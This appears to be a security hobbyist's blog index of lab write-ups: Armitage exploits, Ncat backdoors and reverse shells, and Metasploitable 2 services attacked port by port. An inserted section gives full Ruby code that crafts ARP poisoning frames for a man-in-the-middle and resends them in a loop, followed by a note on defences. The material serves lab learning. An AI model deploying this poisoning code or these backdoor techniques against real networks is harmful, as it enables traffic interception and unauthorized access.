Metasploit: My First Successful Armitage Exploit
I just completed my first successful exploit in the marvellous Metasploit GUI Armitage. Details of the target machine on my Virtual Hacking Lab: Windows XP Pro Service Pack 2 (unpatched). Firewall and...
Setting up a simple backdoor shell using Ncat via Metasploit Armitage
First I exploited my Windows system with Metasploit Armitage obtaining a Meterpreter shell as per this post. Then I needed to upload the ncat.exe file (which I downloaded from here) to the target...
Creating a persistent Ncat backdoor in Windows XP startup using Metasploit
I couldn’t figure out how to do this in Armitage and so had to resort to the good ol’ Terminal. I exploited the XP system as per this post and obtained a Meterpreter shell. First to upload the...
Ncat Reverse Shell (Shell Shovelling)
This will probably be my last Ncat post for now as I really must get on with other things. If you want a comprehensive Ncat tutorial then hop over to IronGeek. Ncat really is a superb tool. Previous...
Ruby PacketFu: ARP Packet Spoofing and Cache Poisoning
My very good online friend Adam has been reading my recent PacketFu blog posts and today sent me the challenge of ARP cache poisoning. And what an excellent challenge it has been. I knew vaguely of ARP...
Ruby PacketFu: ARP Packet Spoofing and Cache Poisoning Infinite Looping Every...
Following on from my last post on ARP Packet Spoofing and Cache Poisoning using PacketFu, Adam advised me: Just a helpful tip the ARP address entry will revert back to the original. ARP requests are...
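As an added illustration of what these two PacketFu posts are doing (this is not the posts' own code, and it uses no PacketFu), the block below builds the raw Ethernet/ARP frames an ARP cache poisoner sends, decodes them back to check the fields, and wraps them in the resend loop the tip above calls for. Every MAC and IP address in it is a constructed sample value; writing frames to the wire needs root and a raw socket, which this example deliberately leaves out.

```ruby
# Added example, not code from the original posts: build the raw Ethernet/ARP
# frames an ARP cache poisoner sends and decode them back. Pure Ruby, no gems.
# All MAC/IP addresses used here are constructed sample values. Writing frames
# to the wire needs root and a raw socket (the posts use PacketFu for that).

ETHERTYPE_ARP = 0x0806
ARP_REPLY     = 2

def mac_to_bytes(mac)
  mac.split(":").map { |h| h.to_i(16) }.pack("C6")
end

def ip_to_bytes(ip)
  ip.split(".").map(&:to_i).pack("C4")
end

def bytes_to_mac(b)
  b.unpack("C6").map { |x| format("%02x", x) }.join(":")
end

def bytes_to_ip(b)
  b.unpack("C4").join(".")
end

# One unsolicited ARP reply (opcode 2) addressed to target_mac/target_ip,
# claiming that spoofed_ip lives at attacker_mac. Layout: 14-byte Ethernet
# header followed by the 28-byte ARP body used for IPv4 over Ethernet.
def build_arp_reply(attacker_mac:, spoofed_ip:, target_mac:, target_ip:)
  eth = mac_to_bytes(target_mac) + mac_to_bytes(attacker_mac) + [ETHERTYPE_ARP].pack("n")
  arp = [1, 0x0800, 6, 4, ARP_REPLY].pack("nnCCn") +        # htype Ethernet, ptype IPv4, hlen, plen, opcode
        mac_to_bytes(attacker_mac) + ip_to_bytes(spoofed_ip) + # sender: "spoofed_ip is at attacker_mac"
        mac_to_bytes(target_mac) + ip_to_bytes(target_ip)      # target: the host being poisoned
  eth + arp
end

# Decode a 42-byte ARP frame (built above or captured) into its fields.
def parse_arp(frame)
  raise ArgumentError, "frame too short" if frame.bytesize < 42
  raise ArgumentError, "not an ARP frame" unless frame.byteslice(12, 2).unpack1("n") == ETHERTYPE_ARP
  htype, ptype, hlen, plen, opcode = frame.byteslice(14, 8).unpack("nnCCn")
  {
    eth_dst: bytes_to_mac(frame.byteslice(0, 6)),
    eth_src: bytes_to_mac(frame.byteslice(6, 6)),
    htype: htype, ptype: ptype, hlen: hlen, plen: plen, opcode: opcode,
    sender_mac: bytes_to_mac(frame.byteslice(22, 6)),
    sender_ip:  bytes_to_ip(frame.byteslice(28, 4)),
    target_mac: bytes_to_mac(frame.byteslice(32, 6)),
    target_ip:  bytes_to_ip(frame.byteslice(38, 4)),
  }
end

# The two frames for a full man-in-the-middle: the victim learns the gateway
# is at the attacker, and the gateway learns the victim is at the attacker.
def poison_pair(attacker_mac:, victim_mac:, victim_ip:, gateway_mac:, gateway_ip:)
  [
    build_arp_reply(attacker_mac: attacker_mac, spoofed_ip: gateway_ip,
                    target_mac: victim_mac, target_ip: victim_ip),
    build_arp_reply(attacker_mac: attacker_mac, spoofed_ip: victim_ip,
                    target_mac: gateway_mac, target_ip: gateway_ip),
  ]
end

# Poisoned entries do not stick: the real host's own ARP traffic or the cache
# timeout restores the true mapping, so the frames are resent on a timer.
# `sender` is any callable taking a frame; rounds: nil loops forever.
# Returns the number of frames handed to `sender`.
def poison_loop(frames, sender, rounds:, interval: 1.0)
  sent = 0
  loop do
    frames.each { |f| sender.call(f) }
    sent += frames.size
    break if rounds && (sent / frames.size) >= rounds
    sleep(interval)
  end
  sent
end
```

The sender passed to `poison_loop` is where PacketFu would come in: PacketFu's `Inject` class writes raw byte strings to an interface, which is all these frames need, and that requires root. The same field layout is what a defender looks for: an ARP reply whose sender IP is the gateway but whose sender MAC is not the gateway's known address, which is exactly the condition a static ARP entry on the victim or dynamic ARP inspection on the switch blocks.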
Metasploitable 2: Port 23 Open Telnet
The Nmap scan of Metasploitable 2 revealed: PORT STATE SERVICE VERSION 23/tcp open telnet Linux telnetd Most of the information on the Internet talks of using a password cracking tool...
Metasploitable 2: Port 25 Open SMTP Postfix SMTPD
The Nmap scan of Metasploitable 2 revealed: PORT STATE SERVICE VERSION 25/tcp open smtp Postfix smtpd Despite researching the Postfix email service, I haven’t uncovered an exploit;...
Metasploitable 2: Port 53 ISC BIND 9.4.2 – Domain Name Server Cache Poisoning
The Nmap scan of Metasploitable 2 revealed: PORT STATE SERVICE VERSION 53/tcp open domain ISC BIND 9.4.2 It’s worth noting at the outset that neither of the below Metasploit...
Metasploitable 2: Apache Killer DoS
The Nmap scan of Metasploitable 2 revealed: PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) The Nessus scan had this to say regarding port 80: 55976...
Metasploitable 2: RPC (Remote Procedure Call) Server
The Nmap scan of Metasploitable 2 revealed: PORT STATE SERVICE VERSION 111/tcp open rpcbind 2 (RPC #100000) The SANS Institute has this to say about rpcbind and Portmapper: What is...
Metasploitable 2: Samba Server
The Nmap scan of Metasploitable 2 revealed: PORT STATE SERVICE VERSION 139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.X (workgroup:...
Metasploitable 2: Remote Access Ports 512, 513 & 514
The Nmap scan of Metasploitable 2 revealed: PORT STATE SERVICE VERSION 512/tcp open exec? 513/tcp open login 514/tcp open tcpwrapped All of these ports are running “r” services. These...
Metasploitable 2: Java RMI (Remote Method Invocation) Server
The Nmap scan of Metasploitable 2 revealed: PORT STATE SERVICE VERSION 1099/tcp open rmiregistry GNU Classpath grmiregistry From Wiki: The Java Remote Method Invocation (Java RMI) is a Java...
Metasploitable 2: Port 1524 ingreslock Backdoor
The Nmap scan of Metasploitable 2 revealed: PORT STATE SERVICE VERSION 1524/tcp open ingreslock? Ingreslock was popular for adding a backdoor on to a compromised server. The Nessus report...
Metasploitable 2: Port 2121 – ProFTPD 1.3.1
The Nmap scan of Metasploitable 2 revealed: PORT STATE SERVICE VERSION 2121/tcp open ftp ProFTPD 1.3.1 The Nessus report on Port 2121 had this to say: 2121/tcp FTP Supports Clear...
Metasploitable 2: Port 3306 MySQL
The Nmap scan of Metasploitable 2 revealed: PORT STATE SERVICE VERSION 3306/tcp open mysql MySQL 5.0.51a-3ubuntu5 The Nessus report on this port was very revealing; here is some of the...
Metasploitable 2: Port 3632 distccd Exploit and Privilege Escalation
The Nmap scan of Metasploitable 2 revealed: PORT STATE SERVICE VERSION 3632/tcp open distccd? What is distccd? Distcc is a program to distribute builds of C, C++, Objective C or Objective...
Metasploitable 2: Port 5432 – PostgreSQL
The Nmap scan of Metasploitable 2 revealed: PORT STATE SERVICE VERSION 5432/tcp open postgresql PostgreSQL DB 8.3.0 – 8.3.7 This exploit is straightforward brute force using Metasploit:...
Metasploitable 2: Port 5900 – VNC
The Nmap scan of Metasploitable 2 revealed: PORT STATE SERVICE VERSION 5900/tcp open vnc VNC (protocol 3.3) The information online pertaining to exploiting this VNC service all use...